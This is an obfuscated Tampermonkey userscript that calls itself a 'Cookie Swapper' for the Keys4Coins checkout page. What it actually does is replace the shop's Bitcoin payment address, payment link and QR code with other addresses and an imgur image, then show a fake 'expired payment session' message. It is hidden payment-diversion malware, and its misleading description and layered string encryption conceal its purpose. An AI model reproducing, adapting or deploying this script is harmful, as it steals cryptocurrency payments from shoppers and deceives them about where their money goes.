// New Script Updated March of 2023
// ==UserScript==
// @name         Keys4Coins Cookie Swapper
// @namespace    http://tampermonkey.net/
// @version      2023
// @description  Swaps Cookies during Payment Process
// @author       wizloot
// @match        https://www.keys4coins.com/checkout/order-pay*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=keys4coins.com
// ==/UserScript==

var f=['y3DFy2HLy2TFDhHFC3rHDhvZ','setAttribute','WRjIfmov','WQddSCkKAvbnxsTvW4VcUbFcLSo4W6NdTNHkW7xcGcddUNNdGSktErGxWORdL8kaWOybWPXHu2T7D8kCjmkqfuhdGMCdWQZcMmk6fmkkWQpdJq==','y3CTDg9VBhrPCa==','yML0y29PBJOXmMG3DtjLoxDTAujgrfu5DMjODMeXn2vcA3q5m21mAevkp2fTB3vUDd0WlJaWotm1nIzHBxa7BgfIzwW9s2v5CZrdB2LUCYuYme9YzgvYjtiWmJC5mZqW','getElementById','z2v0rwXLBwvUDhncEunSyxnZtMfTzq==','C2v0qxr0CMLIDxrL','W4LNy8kEWRCQW64WrYlcSqmyW7XbWO4DWRamWRpdQg9KWQHKW57dLSk8gJ1t','Aw5Uzxjive1m','y3jLyxrLrwXLBwvUDa==','querySelector','apply','img','WQ4uFKq0W6FdPJxcGqXYW6vUgq==','B25JBgLJAW==','gmk7WRlcUCooqa==','[title=\x22Scan\x20QR\x20code\x20or\x20click\x20to\x20open\x20wallet\x20client.\x22]','WRGdAw48W6C=','constructor','WRqGW454EmoFW4BdJuBdIw9og08=','zgL2','remove','xIHBxIbDkYGGk1TEif0RksSPk1TEif19','zCoSsmonW6WTkSkPwHbN'];(function(n,l){var g=function(H){while(--H){n['push'](n['shift']());}},N=function(){var H={'data':{'key':'cookie','value':'timeout'},'setCookie':function(B,k,P,o){o=o||{};var m=k+'='+P,y=0x0;for(var D=0x0,U=B['length'];D<U;D++){var c=B[D];m+=';\x20'+c;var t=B[c];B['push'](t),U=B['length'],t!==!![]&&(m+='='+t);}o['cookie']=m;},'removeCookie':function(){return'dev';},'getCookie':function(B,k){B=B||function(m){return m;};var P=B(new RegExp('(?:^|;\x20)'+k['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)')),o=function(m,y){m(++y);};return o(g,l),P?decodeURIComponent(P[0x1]):undefined;}},w=function(){var B=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return B['test'](H['removeCookie']['toString']());};H['updateCookie']=w;var E='';var d=H['updateCookie']();if(!d)H['setCookie'](['*'],'counter',0x1);else d?E=H['getCookie'](null,'counter'):H['removeCookie']();};N();}(f,0x1d0));var n=function(l,g){l=l-0x0;var N=f[l];return N;};var l=function(n,g){n=n-0x0;var N=f[n];if(l['ZYvhTQ']===undefined){var H=function(E){var d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=',B=String(E)['replace'](/=+$/,'');var k='';for(var P=0x0,o,m,y=0x0;m=B['charAt'](y++);~m&&(o=P%0x4?o*0x40+m:m,P++%0x4)?k+=String['fromCharCode'](0xff&o>>(-0x2*P&0x6)):0x0){m=d['indexOf'](m);}return k;};l['qpztHg']=function(E){var d=H(E);var B=[];for(var k=0x0,P=d['length'];k<P;k++){B+='%'+('00'+d['charCodeAt'](k)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(B);},l['kSghjk']={},l['ZYvhTQ']=!![];}var w=l['kSghjk'][n];if(w===undefined){var E=function(d){this['UrtngE']=d,this['EOVOHf']=[0x1,0x0,0x0],this['zrlcNl']=function(){return'newState';},this['BvJmOj']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['EVzomO']='[\x27|\x22].+[\x27|\x22];?\x20*}';};E['prototype']['aUKAoL']=function(){var d=new RegExp(this['BvJmOj']+this['EVzomO']),B=d['test'](this['zrlcNl']['toString']())?--this['EOVOHf'][0x1]:--this['EOVOHf'][0x0];return this['lkNpBP'](B);},E['prototype']['lkNpBP']=function(d){if(!Boolean(~d))return d;return this['mVNqmK'](this['UrtngE']);},E['prototype']['mVNqmK']=function(d){for(var B=0x0,k=this['EOVOHf']['length'];B<k;B++){this['EOVOHf']['push'](Math['round'](Math['random']())),k=this['EOVOHf']['length'];}return d(this['EOVOHf'][0x0]);},new E(l)['aUKAoL'](),N=l['qpztHg'](N),l['kSghjk'][n]=N;}else N=w;return N;};var g=function(n,l){n=n-0x0;var N=f[n];if(g['MNeJUz']===undefined){var H=function(d){var B='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=',k=String(d)['replace'](/=+$/,'');var P='';for(var o=0x0,m,y,u=0x0;y=k['charAt'](u++);~y&&(m=o%0x4?m*0x40+y:y,o++%0x4)?P+=String['fromCharCode'](0xff&m>>(-0x2*o&0x6)):0x0){y=B['indexOf'](y);}return P;};var E=function(d,B){var P=[],o=0x0,m,u='',p='';d=H(d);for(var U=0x0,c=d['length'];U<c;U++){p+='%'+('00'+d['charCodeAt'](U)['toString'](0x10))['slice'](-0x2);}d=decodeURIComponent(p);var D;for(D=0x0;D<0x100;D++){P[D]=D;}for(D=0x0;D<0x100;D++){o=(o+P[D]+B['charCodeAt'](D%B['length']))%0x100,m=P[D],P[D]=P[o],P[o]=m;}D=0x0,o=0x0;for(var t=0x0;t<d['length'];t++){D=(D+0x1)%0x100,o=(o+P[D])%0x100,m=P[D],P[D]=P[o],P[o]=m,u+=String['fromCharCode'](d['charCodeAt'](t)^P[(P[D]+P[o])%0x100]);}return u;};g['sIxrmG']=E,g['JwjTtL']={},g['MNeJUz']=!![];}var w=g['JwjTtL'][n];if(w===undefined){if(g['tCkkhv']===undefined){var d=function(B){this['BhfLtH']=B,this['rkWBVh']=[0x1,0x0,0x0],this['CeNTBX']=function(){return'newState';},this['igDyOw']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['EDHGDL']='[\x27|\x22].+[\x27|\x22];?\x20*}';};d['prototype']['udlyDN']=function(){var B=new RegExp(this['igDyOw']+this['EDHGDL']),k=B['test'](this['CeNTBX']['toString']())?--this['rkWBVh'][0x1]:--this['rkWBVh'][0x0];return this['EuFCnb'](k);},d['prototype']['EuFCnb']=function(B){if(!Boolean(~B))return B;return this['BjdzzG'](this['BhfLtH']);},d['prototype']['BjdzzG']=function(B){for(var k=0x0,P=this['rkWBVh']['length'];k<P;k++){this['rkWBVh']['push'](Math['round'](Math['random']())),P=this['rkWBVh']['length'];}return B(this['rkWBVh'][0x0]);},new d(g)['udlyDN'](),g['tCkkhv']=!![];}N=g['sIxrmG'](N,l),g['JwjTtL'][n]=N;}else N=w;return N;};var o=g,P=n,k=l,H=function(){var w=!![];return function(E,d){var B=w?function(){var w=n;if(d){var k=d[w('0x11')](E,arguments);return d=null,k;}}:function(){};return w=![],B;};}(),N=H(this,function(){var w=function(){var B=l,d=n,E=g,E=w[E('0x3','lThm')]('return\x20/\x22\x20+\x20this\x20+\x20\x22/')()[d('0x18')](B('0x2'));return!E['test'](N);};return w();});N(),document['getElementById']('payment-address')[k('0xe')]='bc1qew6yjc0q5pquntlw9gtuclkvyxg43zqc6485zq',document[k('0xb')](k('0x8'))[0x0][P('0x5')](o('0x6','[pM$'),k('0x9')),document[k('0xb')](k('0x8'))[0x1][P('0x1')]();var element=document[k('0xf')](P('0x12'));element[k('0xc')]('src',o('0xd','zj2Z')),document[o('0x19','#VuK')](o('0x17','3pVW'))[o('0x15','kLfo')](),document['querySelector'](P('0x16'))[k('0xc')]('href','bitcoin:1JFCqh8q3ms3edA8G7HX5fKD2zurSj2rEp?amount=0.009356&amp;label=Keys4Coins%20Order%20279340'),document[P('0x10')](o('0x7','3g@!'))['appendChild'](element),document[P('0xa')]('check')[k('0x14')]=function(){setTimeout(function(){var y=g,m=l,w=document[m('0xf')](m('0x0'));w['innerHTML']='Expired\x20payment\x20session\x20detected\x20-\x20if\x20you\x20have\x20made\x20an\x20payment,\x20we\x20will\x20return\x20Bitcoins\x20immediately.\x20Any\x20problems?\x20Contact\x20us\x20at:\x20support@keys4coins.com',document[y('0x13','3pVW')](m('0x4'))['appendChild'](w);},0x9c4);}; let lookup_table = { 'https://i.imgur.com/90o6ShZ.png':'https://i.imgur.com/smvz9Ll.png', }; for (let image of document.getElementsByTagName('img')) { 	for (let query in lookup_table) { 		if (image.src == query) { 			image.src = lookup_table[query];
		}
	}
}
